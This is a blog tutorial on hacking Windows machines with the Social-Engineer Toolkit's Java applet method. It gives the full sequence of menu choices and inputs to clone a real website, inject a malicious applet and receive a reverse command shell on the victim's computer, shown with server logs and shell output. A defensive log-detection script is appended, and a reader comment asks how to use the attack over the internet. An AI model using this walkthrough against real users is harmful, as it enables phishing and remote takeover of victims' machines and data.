Hack windows machines with social engineering toolkit | java signed applet method

In a previous post we saw how to exploit remote Windows machines using the Metasploit Java signed applet exploit combined with some social engineering of the user. In this post we try a similar hack using the Social-Engineer Toolkit. The Social-Engineer Toolkit (SET) is an exploitation framework for social engineering attacks such as phishing.

Launch SET. In BackTrack it can be found under BackTrack > Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > set, or launch it from the terminal:

Launch SET

root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# ./set

The main menu comes up.

The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

Select option #1, Social-Engineering Attacks, to move on to the next menu.

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

From this menu select option #2, Website Attack Vectors. The next menu lists the attack methods along with their descriptions.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

Select the first option, Java Applet Attack Method.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

Now SET asks whether it should use a web page from its existing list of templates or clone a website and prepare it for the attack. Select 2) Site Cloner. After this SET asks for some information.

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address for the reverse connection:192.168.1.7
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:lifehacker.com

[*] Cloning the website: http://lifehacker.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: FL8khGiXAvaXu7
[*] Malicious java applet website prepped for deployment

First it asks whether NAT is needed. If the victim is outside your own network, that is over the internet while you are behind a router on your LAN, then NAT is needed. In our case the victim is on the same LAN, so I entered no for NAT.
Next it asks for the IP address for the reverse connection. This is the IP address that the victim machine connects back to in order to provide the shell. It should be the reachable IP address of the attacker's machine, that is the machine where SET is running.

Then SET asks for the URL to clone. We entered lifehacker.com. SET clones the site, creates a look-alike copy of lifehacker.com and injects the Java attack applet into it. Cloning an existing website further misleads the victim into believing the page is genuine, even though it is not the original.

Select payload

After all this, SET finally asks for the payload to use.

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
  12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
  13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  15) Import your own executable              Specify a path for your own executable

Briefly, the payload is the part of the code that provides the final shell once the exploitation step has succeeded. The most commonly used payload is the reverse TCP shell, but here we try a different one, the SE Toolkit Interactive Shell, option 11.

set:payloads>11
set:payloads> PORT of the listener [443]:443
[*] Done, moving the payload into the action.
[-] Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...
[*] Stager turned off, prepping direct download payload...
[*] Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Opera, Chrome, and FireFox [--]

[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..


[-] Launching the SET Interactive Shell...
[*] Crypto.Cipher library is installed. AES will be used for socket communication.
[*] All communications will leverage AES 256 and randomized cipher-key exchange.
[*] The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:443

Once SET is listening, it's time to open the URL in the victim's browser, so browse to the IP address of the attacker's computer from the victim's computer. The browser asks to run Java and then pops up a confirmation dialog.

[Image: java_applet, the Java run confirmation dialog shown to the victim]

Shell

Once the victim clicks Run and allows the applet to execute, the attacker's machine gets a shell on the victim's computer.

192.168.1.2 - - [18/Apr/2013 20:59:18] "GET / HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:18] code 404, message File not found
192.168.1.2 - - [18/Apr/2013 20:59:18] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] code 404, message File not found
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar.pack.gz HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:54] "GET /Gc4pPU HTTP/1.1" 200 -
[*] Connection received from: 192.168.1.2

*** Pick the number of the shell you want ***

1: 192.168.1.2:WINDOWS

Now type 1 and hit Enter.

set> 1
[*] Dropping into the Social-Engineer Toolkit Interactive Shell.
set:active_target>

This is the SET interactive shell. Type help and hit Enter to see the options available in this SET shell. To get the native OS shell, type shell and hit Enter.

set:active_target>shell
[*] Entering a Windows Command Prompt. Enter your commands below.

set:active_target:shell>dir
 Volume in drive C has no label.
 Volume Serial Number is FC18-53D3

 Directory of C:\Documents and Settings\enlightened\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.64

04/15/2013  02:46 AM    <DIR>          .
04/15/2013  02:46 AM    <DIR>          ..
04/09/2013  01:56 AM        44,521,424 chrome.dll
04/09/2013  01:07 AM           882,175 chrome_100_percent.pak
04/09/2013  01:56 AM            57,296 chrome_frame_helper.dll
04/09/2013  01:56 AM            82,896 chrome_frame_helper.exe
................

This Java applet based attack is not actually an exploit; it relies on the same mechanism used by browser-based Java remote desktop solutions. That is, a signed applet that the user approves is allowed to run with the user's privileges, nothing more. However, it can be used by attackers against users who do not recognise the phishing and click Run without understanding the consequences.
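As an added detection example (not part of the original post and not SET's own code), the following Python script parses log lines in the format the SET web server printed above and flags a client that successfully fetched a .jar and then, shortly afterwards, requested a short extension-less path, which is the download sequence the cloned page produces. The sample lines are constructed to mirror the excerpt in the post; the same logic applies to proxy or web-filter logs once the parsing regex is adapted.

```python
import re
from datetime import datetime

# Matches the SimpleHTTPServer-style lines the SET web server printed above.
LOG_RE = re.compile(r'^(?P<client>\S+) - - \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y %H:%M:%S"
# The obfuscated payload names on the page (FL8khGiXAvaXu7, Gc4pPU) are short
# alphanumeric paths with no extension; that is the second request we look for.
RANDOM_PATH_RE = re.compile(r"^/[A-Za-z0-9]{5,20}$")

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # e.g. "code 404, message File not found" lines are skipped
    return {"client": m["client"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "path": m["path"], "status": int(m["status"])}

def find_applet_staging(lines, window_s=120):
    """Return (client, jar_path, payload_path) for each client that fetched a .jar
    (HTTP 200) and then, within window_s seconds, a short extension-less path."""
    last_jar = {}  # client -> (timestamp, jar path)
    hits = []
    for rec in filter(None, map(parse, lines)):
        if rec["status"] != 200:
            continue
        if rec["path"].lower().endswith(".jar"):
            last_jar[rec["client"]] = (rec["ts"], rec["path"])
        elif rec["client"] in last_jar and RANDOM_PATH_RE.match(rec["path"]):
            jar_ts, jar_path = last_jar[rec["client"]]
            if 0 <= (rec["ts"] - jar_ts).total_seconds() <= window_s:
                hits.append((rec["client"], jar_path, rec["path"]))
    return hits

# Constructed sample, modelled on the log excerpt in the post; the 192.168.1.9
# client is benign browsing that must not be flagged.
SAMPLE = """\
192.168.1.2 - - [18/Apr/2013 20:59:18] "GET / HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:18] code 404, message File not found
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar.pack.gz HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:54] "GET /Gc4pPU HTTP/1.1" 200 -
192.168.1.9 - - [18/Apr/2013 21:03:10] "GET /index.html HTTP/1.1" 200 -
192.168.1.9 - - [18/Apr/2013 21:03:12] "GET /logo.png HTTP/1.1" 200 -
""".splitlines()

if __name__ == "__main__":
    for client, jar, payload in find_applet_staging(SAMPLE):
        print(f"{client}: fetched {jar} then {payload}; possible applet-delivered payload")
```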

Last Updated On : 18th April 2013


1 Comment

  • Thank you for the tutorial. I have a question, how do you set up the NAT for outside use? I’m new at this and trying to learn. Thanks!
